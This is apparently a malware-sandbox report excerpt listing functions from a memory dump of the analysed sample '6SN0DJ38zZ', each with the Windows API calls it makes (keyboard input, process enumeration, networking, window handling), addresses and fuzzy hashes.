Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: a930319cc891fb5912da5da68a5ea4789db2f41bbbcc10095b009405aa40ac06
Instruction ID: 8207bd27a5346a2786cfe6ba09f990473aa8e05437e2c2da9d7118334914c08c
Opcode Fuzzy Hash: a930319cc891fb5912da5da68a5ea4789db2f41bbbcc10095b009405aa40ac06
Instruction Fuzzy Hash: 64413D35600555DFCB11EF15C484A6EBBE5EF89314F098098ED4AAB762CB30FD02DB91

Function 00A08851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A088DE

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 21c05e00ec4e4e3c84139378715bcbbeff3aa2d8b8b41417212eeb1d60cb1241
Instruction ID: bec621cd5c5750f19fb493b4731341e28e3f6bdc850fbfe6421c4f0991eca09b
Opcode Fuzzy Hash: 21c05e00ec4e4e3c84139378715bcbbeff3aa2d8b8b41417212eeb1d60cb1241
Instruction Fuzzy Hash: 0231C634A0010CEFEF20AB68EC85BBC77B5EB05390F544112F991E72E1CE79E9459B5A

Function 00A0AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00A0AB60
GetWindowRect.USER32(?,?), ref: 00A0ABD6
PtInRect.USER32(?,?,00A0C014), ref: 00A0ABE6
MessageBeep.USER32(00000000), ref: 00A0AC57

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: b45522b16abd218f88b1ab8c47cb183ee8f6dc6e674ea5d9d969fd8152848cee
Instruction ID: 9303538539d94f1bd35922fc8422ea21e8cb94b1065d29177e3117a174486028
Opcode Fuzzy Hash: b45522b16abd218f88b1ab8c47cb183ee8f6dc6e674ea5d9d969fd8152848cee
Instruction Fuzzy Hash: 8841B134A0021CDFDB21DF98E884B997BF5FF59300F1580A9E815DB2A1D731E842DB92

Function 009E0AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 009E0B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 009E0B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 009E0BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 009E0BFB

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 2ce66e47a1cabcc4a7cf43f4d3dd44285606c8f3d034d8ad6165ab8a0b283e54
Instruction ID: 12f2ab28a37c0fe0035a0b0236b03c3a76072358505ebcefff4840473562fd29
Opcode Fuzzy Hash: 2ce66e47a1cabcc4a7cf43f4d3dd44285606c8f3d034d8ad6165ab8a0b283e54
Instruction Fuzzy Hash: 26315730940288AEFF328B668C05BFEBBADBBC4314F0C426AE481521D1C3F88DD19751

Function 009E0C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 009E0C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 009E0C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 009E0CE1
SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 009E0D33

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: aabbc49f3a0f54d6ae15489d7604e3cea15cbdbe9428b0d8433a1f1a39507d38
Instruction ID: b9b7682bb2e050fba99cb4ac075ae9c3876bb390141f066bd025fc3e992fafc5
Opcode Fuzzy Hash: aabbc49f3a0f54d6ae15489d7604e3cea15cbdbe9428b0d8433a1f1a39507d38
Instruction Fuzzy Hash: 32313730940388AEFF328B668C157BEBB6AABC5310F14871AE4C1621D1C3B99DD68752

Function 009B61C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009B61FB
__isleadbyte_l.LIBCMT ref: 009B6229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 009B6257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 009B628D

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 817e036653858e5e6398a7523efa318ba7be104fe84ea88ae2ed001239a144b9
Instruction ID: 5cbc966da7ff9006b02e44201cc8a2c2e1fd8f1a18aa01129df547620896437d
Opcode Fuzzy Hash: 817e036653858e5e6398a7523efa318ba7be104fe84ea88ae2ed001239a144b9
Instruction Fuzzy Hash: F931C131604246AFEF218F68CD48BFA7BA9FF42320F154528E864D7191E734E951DB90

Function 00A04EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00A04F02

Part of subcall function 009E3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 009E365B
Part of subcall function 009E3641: GetCurrentThreadId.KERNEL32 ref: 009E3662
Part of subcall function 009E3641: AttachThreadInput.USER32(00000000,?,009E5005), ref: 009E3669

GetCaretPos.USER32(?), ref: 00A04F13
ClientToScreen.USER32(00000000,?), ref: 00A04F4E
GetForegroundWindow.USER32 ref: 00A04F54

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: bce828c436e59f14b1b7a0bec6e28bce8f2ddb024baac03bdcc66978d64548f0
Instruction ID: c09738185bf16f6f1f29bc73d6fc66f6ef426ac3c70e64089805c74182a373c1
Opcode Fuzzy Hash: bce828c436e59f14b1b7a0bec6e28bce8f2ddb024baac03bdcc66978d64548f0
Instruction Fuzzy Hash: E9313CB1D00108AFCB10EFB5C885AEFB7F9EF88304F10406AE815E7241DA71AE45CBA0

Function 009E3C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 009E3C7A
Process32FirstW.KERNEL32(00000000,?), ref: 009E3C88
Process32NextW.KERNEL32(00000000,?), ref: 009E3CA8
CloseHandle.KERNEL32(00000000), ref: 009E3D52

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 6be6e9ca08800c605f572eeb88855f1fad2509c29410cf402bb909b0d363d480
Instruction ID: ed013e6007f0c3db720e89ce0936ad5535b9d0343fab9977a7e4f7e3faac0fd0
Opcode Fuzzy Hash: 6be6e9ca08800c605f572eeb88855f1fad2509c29410cf402bb909b0d363d480
Instruction Fuzzy Hash: C2319C711083459FC311EF51C885BABBBE8AFD9310F50092CF582862A1EB71DE4ACB92

Function 00A0C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623

GetCursorPos.USER32(?), ref: 00A0C4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,009BB9AB,?,?,?,?,?), ref: 00A0C4E7
GetCursorPos.USER32(?), ref: 00A0C534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,009BB9AB,?,?,?), ref: 00A0C56E

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 9499f2318ed0e3a7bbd6a4dfe3de808d5fd94351530ff222d24dc9784c311f3a
Instruction ID: 4281d56c1d077f6b98ce69d887f9a201923b1d0d411df474a6e796463d023c29
Opcode Fuzzy Hash: 9499f2318ed0e3a7bbd6a4dfe3de808d5fd94351530ff222d24dc9784c311f3a
Instruction Fuzzy Hash: 7B31853990005CAFCB25CF98DC68EEA7BB5EB49320F444165F9059B2A1C732BD51DBA4

Function 009D8656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009D810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 009D8121
Part of subcall function 009D810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 009D812B
Part of subcall function 009D810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009D813A
Part of subcall function 009D810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 009D8141
Part of subcall function 009D810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009D8157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009D86A3
_memcmp.LIBCMT ref: 009D86C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 009D86FC
HeapFree.KERNEL32(00000000), ref: 009D8703

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 35d2042468d3a4c34917c7ab5f066901c52b5af2492e07433d57d4f286e3e104
Instruction ID: 054cc4d9b4de81218f063a449f3021b1ae418c2295f7c3e0af358dad200815b6
Opcode Fuzzy Hash: 35d2042468d3a4c34917c7ab5f066901c52b5af2492e07433d57d4f286e3e104
Instruction Fuzzy Hash: CF217C71E84209EFDB10DFA4C949BEEB7B8EF44314F55805AE444A7242EB30AE05CB90

Function 009A098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 009A09AE

Part of subcall function 00985A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,009E7896,?,?,00000000), ref: 00985A2C
Part of subcall function 00985A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,009E7896,?,?,00000000,?,?), ref: 00985A50

_fprintf.LIBCMT ref: 009A09E5
OutputDebugStringW.KERNEL32(?), ref: 009D5DBB

Part of subcall function 009A4AAA: _flsall.LIBCMT ref: 009A4AC3

__setmode.LIBCMT ref: 009A0A1A

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: a2726d312c1f8d97b49944b8dd1042be4da73a45b23bb02c7dd5ee0b417149dc
Instruction ID: 9b23bdc83fd95ace9a7b38a1d393ab86c3346de0f515c27e7e6a38b593ca0a5d
Opcode Fuzzy Hash: a2726d312c1f8d97b49944b8dd1042be4da73a45b23bb02c7dd5ee0b417149dc
Instruction Fuzzy Hash: A21127319046046FD704B7B8AC47AFE776D9FC7320F24012AF10566282EEA55C4697E1

Function 009F1767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009F17A3

Part of subcall function 009F182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009F184C
Part of subcall function 009F182D: InternetCloseHandle.WININET(00000000), ref: 009F18E9

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 4cd5aed8d13367d58fc4c3b2098e8659fa6df8da836f1bf9d6d6f559dcdaedd2
Instruction ID: e595a7c55ff799561e319e3d3ad38f0ee06b3ca16232c193018a2c27372c11e2
Opcode Fuzzy Hash: 4cd5aed8d13367d58fc4c3b2098e8659fa6df8da836f1bf9d6d6f559dcdaedd2
Instruction Fuzzy Hash: E921A431200609FFEB169F60DC01FBABBADFF88750F14442AFB15A6550D775982297E1

Function 009E3A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00A0FAC0), ref: 009E3A64
GetLastError.KERNEL32 ref: 009E3A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 009E3A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00A0FAC0), ref: 009E3ADF

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: cf3ca5ae714c01723f1e5feb24f998278a883dc622feb318048499ce9fd783e0
Instruction ID: 5fe02c5955675db08e416692a8bf61efed3700358cc2e21aae838ee38e3b5627
Opcode Fuzzy Hash: cf3ca5ae714c01723f1e5feb24f998278a883dc622feb318048499ce9fd783e0
Instruction Fuzzy Hash: E821D634108205DFC310EF29C8859AAB7E8BE59364F108A2DF499D72E1D731DE86CB82

Function 009DDCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 009DF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,009DDCD3,?,?,?,009DEAC6,00000000,000000EF,00000119,?,?), ref: 009DF0CB
Part of subcall function 009DF0BC: lstrcpyW.KERNEL32(00000000,?,?,009DDCD3,?,?,?,009DEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 009DF0F1
Part of subcall function 009DF0BC: lstrcmpiW.KERNEL32(00000000,?,009DDCD3,?,?,?,009DEAC6,00000000,000000EF,00000119,?,?), ref: 009DF122

lstrlenW.KERNEL32(?,00000002,?,?,?,?,009DEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 009DDCEC
lstrcpyW.KERNEL32(00000000,?,?,009DEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 009DDD12
lstrcmpiW.KERNEL32(00000002,cdecl,?,009DEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 009DDD46

Strings

cdecl, xrefs: 009DDD3D

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 8c4867324178df001715c0099bc6f2b96fb5471a7ef503e7061a5902deb3ba1f
Instruction ID: 859cf059334b8032c9b4eb7ba71fd62d106de2815f2c93fcb66a21f89c633137
Opcode Fuzzy Hash: 8c4867324178df001715c0099bc6f2b96fb5471a7ef503e7061a5902deb3ba1f
Instruction Fuzzy Hash: A211BE3A200309EFCF25AF74D845A7A77A9FF86350B50812BF906CB7A0EB719841C791

Function 009B50E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 009B5101

Part of subcall function 009A571C: __FF_MSGBANNER.LIBCMT ref: 009A5733
Part of subcall function 009A571C: __NMSG_WRITE.LIBCMT ref: 009A573A
Part of subcall function 009A571C: RtlAllocateHeap.NTDLL(01370000,00000000,00000001,00000000,?,?,?,009A0DD3,?), ref: 009A575F

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 7bc5ac9a9b28830539e93489a11e43a8086b21a345308f16d0f27ab761d2745f
Instruction ID: 634ad9a0d5834dd3edf008d948d7e695f55200fb871b34eee1af5f94302264a0
Opcode Fuzzy Hash: 7bc5ac9a9b28830539e93489a11e43a8086b21a345308f16d0f27ab761d2745f
Instruction Fuzzy Hash: A5110AB2908A15AFCF316FB8BD0579E379C9F46371B124929FA049A151DF35C84187D0

Function 009F6369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00985A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,009E7896,?,?,00000000), ref: 00985A2C
Part of subcall function 00985A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,009E7896,?,?,00000000,?,?), ref: 00985A50

gethostbyname.WSOCK32(?,?,?), ref: 009F6399
WSAGetLastError.WSOCK32(00000000), ref: 009F63A4
_memmove.LIBCMT ref: 009F63D1
inet_ntoa.WSOCK32(?), ref: 009F63DC

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: b2b6a6b215c40ec0b351e89052d2e07d1ad9b0f574006c873ecfb7ae8786a698
Instruction ID: 35b46579d226d4f515e775d2445aa2b18a033c9db2e3e6dc7ba660ddb68fc718
Opcode Fuzzy Hash: b2b6a6b215c40ec0b351e89052d2e07d1ad9b0f574006c873ecfb7ae8786a698
Instruction Fuzzy Hash: 55112E35500109AFCF04FBA4DD86EFEB7B8AF88310B544465F506B7261DB31AE19DBA1

Function 009D8B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 009D8B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 009D8B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 009D8B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 009D8BA4

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 9511a8538d0606709b06c4e03c96d31bacd142277a9474926f979224d69be8d7
Instruction ID: 3c8065af80ea36cd3260e07734334653efad92b643092d63fc1eaf4ac23b4f1c
Opcode Fuzzy Hash: 9511a8538d0606709b06c4e03c96d31bacd142277a9474926f979224d69be8d7
Instruction Fuzzy Hash: D4115E79940218FFDB10DFA5CC84FAEBB78FB48710F2040A6E900B7250DA716E11DB94

